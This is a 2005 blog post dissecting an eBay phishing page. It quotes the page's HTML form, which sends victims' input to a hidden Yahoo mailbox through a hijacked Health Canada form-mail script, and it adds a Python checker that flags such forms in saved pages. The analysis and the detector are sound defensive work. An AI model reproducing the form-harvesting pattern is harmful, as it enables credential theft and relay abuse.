Sunday, February 20, 2005

Phishing in action - part II

It looked so great, the phishing site, because it succeeded in hijacking the URL, so there is no need to copy the eBay site: let the real eBay do that work for you. But you notice it as soon as you hit the Back button (which brings you back to where you were before the first fake eBay page). Still, the URL reveals that the original link of the phishing site is:
http://members.aol.com/mbrserviceebay/ebay.html

And the source of that page states: <!-- saved from url=http://kok.8k.com/-->
which is a site that is no longer active.

The mail engine in the source code says:
<form method="post" action="http://www.hc-sc.gc.ca/cgi-bin/fmail.pl">
<input type="hidden" value="giftcardz@yahoo.com" name="recipient">
<input type="hidden" value="http://www.ebay.com" name="redirect">
<input type="hidden" value="ebaY hiT" name="form_subject">
<table cellSpacing="0" cellPadding="0" bgColor="#999999" border="0">

So apparently the Health Canada site has been hijacked to serve as a mail receipt engine: the form posts to its fmail.pl script, with the recipient address supplied in a hidden field.
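
As an added example (not part of the original post), here is a small check a mail or web filter could run over a saved page to flag the pattern seen in this source: a form that posts to a different host and carries a hidden recipient mailbox and redirect. The names `FormAudit` and `audit_forms` are hypothetical, and the sample input is the form quoted above written as ordinary HTML tags.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the form fragment quoted in the post, as ordinary HTML.
SAMPLE_HTML = """
<form method="post" action="http://www.hc-sc.gc.ca/cgi-bin/fmail.pl">
<input type="hidden" value="giftcardz@yahoo.com" name="recipient">
<input type="hidden" value="http://www.ebay.com" name="redirect">
<input type="hidden" value="ebaY hiT" name="form_subject">
</form>
"""
PAGE_URL = "http://members.aol.com/mbrserviceebay/ebay.html"

class FormAudit(HTMLParser):
    """Collect each form's action URL and its hidden input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "hidden": {}})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "hidden":
            self.forms[-1]["hidden"][(a.get("name") or "").lower()] = a.get("value") or ""

def audit_forms(html, page_url):
    """Return one finding per form that looks like a form-mail relay of user input."""
    parser = FormAudit()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        action_host = urlparse(form["action"]).hostname
        redirect_host = urlparse(form["hidden"].get("redirect", "")).hostname
        reasons = []
        if action_host and action_host != page_host:
            reasons.append("form posts to another host: " + action_host)
        if "@" in form["hidden"].get("recipient", ""):
            reasons.append("hidden recipient mailbox: " + form["hidden"]["recipient"])
        if redirect_host and redirect_host not in (page_host, action_host):
            reasons.append("redirects to third host after submit: " + redirect_host)
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_forms(SAMPLE_HTML, PAGE_URL):
        print(f["action"], *f["reasons"], sep="\n  ")
```

A form whose action is relative to its own page and which has no hidden recipient or off-site redirect produces no finding.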